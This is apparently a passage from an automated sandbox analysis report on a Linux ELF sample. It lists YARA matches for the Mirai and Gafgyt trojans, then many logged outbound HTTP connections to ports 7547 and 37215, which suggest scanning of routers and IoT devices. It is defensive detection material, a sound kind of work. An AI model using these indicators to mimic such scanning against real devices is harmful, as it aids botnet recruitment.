      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: Process Memory Space: debug.dbg.elf PID: 5431, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: debug.dbg.elf PID: 5434, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: classification engineClassification label: mal96.troj.linELF@0/0@3/0
      Source: /tmp/debug.dbg.elf (PID: 5431)Directory: /tmp/.Jump to behavior
      Source: /tmp/debug.dbg.elf (PID: 5431)Directory: /tmp/..Jump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55804 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36156 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59250 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53228 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37966 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52030 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45154 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36226 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59716 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43894 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36840 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44832 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38300 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43062 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51322 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35964 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40964 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37008 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38686 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35692 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36232 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41210 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35950 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52414 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54220 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54440 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55320 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58820 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44078 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44884 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37274 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38948 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52622 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55466 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37784 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39344 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40214 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40410 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51916 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52350 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42262 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50976 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56010 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56106 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33400 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52628 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40760 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46328 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39882 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40704 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40414 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38306 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54306 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38316 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54310 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56436 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33176 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37268 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48036 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54720 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51398 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33914 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35142 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38290 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39768 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43150 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48234 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42460 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39492 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41966 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35072 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35946 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37816 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58444 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58858 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56654 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53440 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48056 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36864 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42626 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48400 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37912 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35470 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45100 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59206 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38182 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38198 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56532 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59270 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57744 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54082 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47234 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59150 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34100 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45164 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35534 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57682 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45968 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41552 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41792 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53294 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57948 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57938 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46220 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56756 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54314 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47466 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34332 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48266 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35956 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34812 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50536 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40760 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37976 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 33876 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40784 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38658 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35180 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34256 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39042 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41160 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37692 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49340 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56806 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48356 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56798 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57078 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48364 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36958 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36994 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36254 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40654 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51916 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34568 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 33752 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38852 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41738 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57130 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51724 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37912 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56044 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41332 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34850 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34032 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39130 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44152 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57282 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40552 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58754 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44940 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36160 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53196 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41180 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59230 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38166 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56858 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41198 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60644 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59360 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41678 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53100 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56982 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53288 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41312 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44262 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54556 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38290 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41322 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57380 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40648 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58850 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45036 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36254 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37224 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60756 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41280 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36322 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42748 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51724 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60008 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51736 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43072 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34564 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37496 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56384 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 33974 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39132 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59116 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36958 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41658 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34104 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45274 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34122 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43732 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34054 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54518 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46526 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36138 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48702 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43200 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40620 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41326 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46904 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57258 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60030 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53792 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 32846 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52990 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56668 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45122 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54622 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53930 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41714 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34248 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59182 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43446 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46988 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60310 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54248 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42708 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58200 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35430 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59208 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46080 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56468 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47186 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46586 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36586 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42568 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43258 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46660 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41174 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35574 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 48948 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 57664 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46678 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 46532 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40284 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44606 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36678 -> 7547
